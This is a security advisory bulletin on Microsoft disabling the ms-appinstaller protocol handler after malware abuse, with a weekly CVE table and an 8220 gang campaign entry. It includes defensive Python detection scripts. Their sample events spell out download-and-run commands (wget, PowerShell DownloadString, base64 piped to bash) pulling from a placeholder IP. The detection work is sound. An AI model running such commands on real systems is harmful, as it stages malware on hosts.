Subject: Microsoft Disables MSIX App Installer Protocol
Severity: High (CVE-2021-43890), CVSS v3.0 Score: 7.1
Date: 30-12-2023 (Latest Update)
General Information
The ms-appinstaller protocol handler (AppX Installer) was introduced to enable users to seamlessly install an application by simply clicking a link on a website. Basically, this protocol handler provides a way for users to install Windows applications directly from a web server using an MSIX package or App Installer file without first downloading the installers to their computer.
News Description
Since November 2023, Microsoft Threat Intelligence has observed threat actors such as Storm-0569, Storm-1113, Sangria Tempest, and Storm-1674 abusing the ms-appinstaller (App Installer) protocol handler to distribute malware. After investigating this activity, Microsoft disabled the ms-appinstaller protocol handler by default.
The observed activity showed the threat actors using the ms-appinstaller protocol handler as an access vector for malware that may lead to ransomware distribution. Multiple cybercriminals are also selling a malware kit as a service for distributing signed malicious MSIX application packages through websites that victims reach via malicious advertisements for legitimate, popular software.
Conclusion
Threat actors have likely chosen the ms-appinstaller protocol handler vector because it can bypass mechanisms designed to help keep users safe from malware, such as Microsoft Defender SmartScreen and built-in browser warnings for downloads of executable file formats.
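Because the handler is triggered by an ordinary web link of the form ms-appinstaller:?source=<package URL>, one practical defensive check is to scan proxy logs or fetched page bodies for such links and alert when the package source is not an approved internal host. The following Python scan is an added example, not code from the advisory or from Microsoft; the log lines, hosts and allow-list are constructed.

```python
import re
from urllib.parse import unquote, urlsplit

# Link shape used by the protocol handler: ms-appinstaller:?source=<package URL>
MS_APPINSTALLER_RE = re.compile(r"ms-appinstaller:\?source=([^\s\"'<>]+)", re.IGNORECASE)
# File types the handler fetches: MSIX/AppX packages and App Installer manifests
PACKAGE_EXTS = (".msix", ".msixbundle", ".appx", ".appxbundle", ".appinstaller")


def find_appinstaller_links(text):
    """Return one finding per ms-appinstaller: link found in text."""
    findings = []
    for match in MS_APPINSTALLER_RE.finditer(text):
        source = unquote(match.group(1))  # links are often percent-encoded
        parts = urlsplit(source)
        findings.append({
            "source": source,
            "host": (parts.hostname or "").lower(),
            "is_package": parts.path.lower().endswith(PACKAGE_EXTS),
            "https": parts.scheme.lower() == "https",
        })
    return findings


def scan_lines(lines, allowed_hosts):
    """Alert on every ms-appinstaller: source whose host is not on the allow-list."""
    alerts = []
    for line in lines:
        for f in find_appinstaller_links(line):
            if f["host"] not in allowed_hosts:
                alerts.append((f["host"], f["source"]))
    return alerts


# Constructed proxy log lines with the returned HTML snippet appended; not real telemetry.
SAMPLE_LINES = [
    "2023-12-28T10:02:11Z 10.0.0.5 GET https://apps.corp.example/downloads/ "
    '<a href="ms-appinstaller:?source=https://apps.corp.example/pkg/LobApp.msix">Install</a>',
    "2023-12-28T10:05:40Z 10.0.0.7 GET https://ad-landing.example/install "
    '<a href="ms-appinstaller:?source=https%3A%2F%2Fcdn.ad-landing.example%2Fsetup.appinstaller">Get</a>',
    "2023-12-28T10:06:02Z 10.0.0.7 GET https://cdn.ad-landing.example/setup.appinstaller",
    "2023-12-28T10:09:15Z 10.0.0.9 GET https://intranet.corp.example/news/",
]
ALLOWED_HOSTS = {"apps.corp.example"}  # constructed allow-list of internal package hosts

if __name__ == "__main__":
    for host, source in scan_lines(SAMPLE_LINES, ALLOWED_HOSTS):
        print(f"ALERT ms-appinstaller link to non-allow-listed host {host}: {source}")
```

The scan decodes percent-encoded source URLs before checking the host, since the second constructed line would otherwise slip past a naive string match.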
Indicators of Compromise (IOCs)
The important thing is our security systems: we must stay vigilant and monitor as usual.
For more information, please contact:
Email: sales@inetms.co.th
065 149 2822 (Ms.Suphatson )
061 404 5895 (Ms.Thanyakan)
063 204 4534 (Ms.Atsamaphorn)
065 929 6330 (Ms.Kansinee)
Reference Website
– https://thehackernews.com/2023/12/microsoft-disables-msix-app-installer.html
– https://learn.microsoft.com/en-us/windows/msix/app-installer/installing-windows10-apps-web
– https://therecord.media/microsoft-disables-app-installation-protocol-abused-by-hackers
– https://www.thewindowsclub.com/ms-appinstaller-protocol-has-been-disabled
– https://nvd.nist.gov/vuln/detail/CVE-2021-43890
Weekly Interesting CVE
| No. | CVE Name | Published Date | Last Update | Device/Application/OS Target | Attack Type | CVSS | Detail | Solution | Ref |
|---|---|---|---|---|---|---|---|---|---|
| 1 | CVE-2023-42017 | 22/12/2023 | 22/12/2023 | IBM Planning Analytics | Unrestricted upload | 7.8 | IBM Planning Analytics Local 2.0 could allow a remote attacker to upload arbitrary files, caused by improper validation of file extensions. By sending a specially crafted HTTP request, a remote attacker could exploit this vulnerability to upload a malicious script, which could allow the attacker to execute arbitrary code on the vulnerable system. IBM X-Force ID: 265567. | Upgrade versions | |
| 2 | CVE-2023-43585 | 13/12/2023 | 18/12/2023 | Zoom Mobile App / Zoom SDKs | Improper Access Control | 7.1 | Improper access control in Zoom Mobile App for iOS and Zoom SDKs for iOS before version 5.16.5 may allow an authenticated user to conduct a disclosure of information via network access. | Upgrade versions | https://www.zoom.com/en/trust/security-bulletin/ZSB-23058/ |
| 3 | CVE-2023-7024 | 20/12/2023 | 20/12/2023 | Google Chrome web browser | Heap-based overflow | 6 | This high-severity zero-day vulnerability is a heap buffer overflow weakness in the open-source WebRTC framework, which many other web browsers, such as Mozilla Firefox, Safari, and Microsoft Edge, also use to provide Real-Time Communications (RTC) capabilities (e.g., video streaming, file sharing, and VoIP telephony) via JavaScript APIs. | Upgrade to Chrome version 120.0.6099.129/130 for Windows and 120.0.6099.129 for macOS and Linux | |
| 4 | CVE-2023-36033 | 21/12/2023 | 21/12/2023 | Windows 10 1809, 21H2, 22H2 | Local Privilege Escalation | 7.8 | An attacker can trigger this vulnerability to elevate privileges through the Windows Desktop Window Manager (DWM). An attacker can exploit the flaw to gain SYSTEM privileges, and chaining this issue with a remote code execution bug can compromise a system. | Update Patch | https://securityaffairs.com/154175/security/microsoft-patch-tuesday-security-updates-nov-2023.html |
| 5 | CVE-2023-36397 | 21/12/2023 | 21/12/2023 | Windows 10 Version 160, 1809, 21H2, 22H2 | Remote Code Execution | 8.9 | A Windows Pragmatic General Multicast (PGM) remote code execution issue tracked as CVE-2023-36397. A remote, unauthenticated attacker can exploit this flaw to execute code with elevated privileges without user interaction. | Update Patch | https://nvd.nist.gov/vuln/detail/CVE-2023-6707 |
Malware News or Campaign IOC/IOA
| No | Campaign Name | Detection in Thailand | Detection Date | Attack Type | Severity | Description | Solution |
|---|---|---|---|---|---|---|---|
| 1 | Undocumented 8220 Gang Activities Exposed | 32 | 18/12/2023 | Downloader, Tool, Remote Access Trojan (RAT), Vulnerability | Low | The 8220 gang, known for widespread deployment of evolving malware tactics, has been detected engaging in previously undocumented activity. This threat actor, believed to be of Chinese origin, targets both Windows and Linux web servers with cryptojacking malware. Exploiting various vulnerabilities, including CVE-2021-44228, CVE-2017-3506, and CVE-2020-14883, the 8220 gang uses different methods such as cURL, wget, lwp-download, Python urllib, and a custom base64-encoded bash function to download second-phase files on Linux hosts. On Windows, a simple PowerShell WebClient command executes a downloaded PowerShell script. The group also employs a variation where Java code is executed without relying on an externally hosted XML file. These attacks have been observed across sectors such as healthcare, telecommunications, and financial services in the United States, South Africa, Spain, Colombia, and Mexico. | 1. Update your antivirus to the latest version. 2. Update Oracle WebLogic to version 14.1.1. 3. Create a firewall policy to block the network IoCs listed in Ref. 1. Ref. 1: https://www.imperva.com/blog/imperva-detects-undocumented-8220-gang-activities/ |
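The download methods listed in the 8220 description (cURL, wget, lwp-download, Python urllib, a base64-decoded bash stage, and PowerShell WebClient) can be turned into process-creation detections that weigh the parent process: a downloader spawned by a web or application server process is the pattern described, while the same command from an interactive shell is routine. The following Python rule set is an added example, not code from the advisory or from Imperva; the events, hosts, users and URLs are constructed.

```python
import re

# One rule per download method named in the 8220 description above.
RULES = [
    ("linux_fetch_tool", re.compile(r"\b(curl|wget|lwp-download)\b.*https?://", re.I)),
    ("python_urllib", re.compile(r"\bpython[23]?\b.*\burllib\b", re.I)),
    ("base64_bash_stage", re.compile(r"base64\s+(-d|--decode)\s*\|\s*(ba)?sh\b", re.I)),
    ("powershell_webclient",
     re.compile(r"powershell.*(New-Object\s+(System\.)?Net\.WebClient|Download(String|File))", re.I)),
]
# Parents that should not normally spawn downloaders: web / application server processes
WEB_SERVER_PARENTS = {"java", "httpd", "nginx", "w3wp.exe", "tomcat"}


def classify(cmdline):
    """Names of every rule the command line matches (empty list if none)."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan_events(events):
    """events: (host, user, parent_process, cmdline). Returns matching events with a severity."""
    hits = []
    for host, user, parent, cmd in events:
        rules = classify(cmd)
        if not rules:
            continue
        # Downloader launched by a web server process: the pattern in the description above.
        severity = "high" if parent.lower() in WEB_SERVER_PARENTS else "low"
        hits.append({"host": host, "user": user, "parent": parent, "rules": rules, "severity": severity})
    return hits


# Constructed process-creation events; the base64 string decodes to a harmless "echo hi".
SAMPLE_EVENTS = [
    ("web01", "oracle", "java", "wget -q -O /tmp/u.sh http://198.51.100.7/u.sh"),
    ("web01", "oracle", "java", "bash -c 'echo ZWNobyBoaQ== | base64 -d | bash'"),
    ("web01", "oracle", "java", "python3 -c 'import urllib.request as u; u.urlretrieve(\"http://198.51.100.7/p\", \"/tmp/p\")'"),
    ("win02", "SYSTEM", "w3wp.exe", "powershell -c \"(New-Object Net.WebClient).DownloadString('http://198.51.100.7/s.ps1')\""),
    ("ops01", "admin", "bash", "curl -s https://intranet.corp.example/health"),
    ("web01", "oracle", "java", "/usr/bin/java -jar app.jar"),
]

if __name__ == "__main__":
    for hit in scan_events(SAMPLE_EVENTS):
        print(hit["severity"].upper(), hit["host"], hit["parent"], ",".join(hit["rules"]))
```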
04 January 2024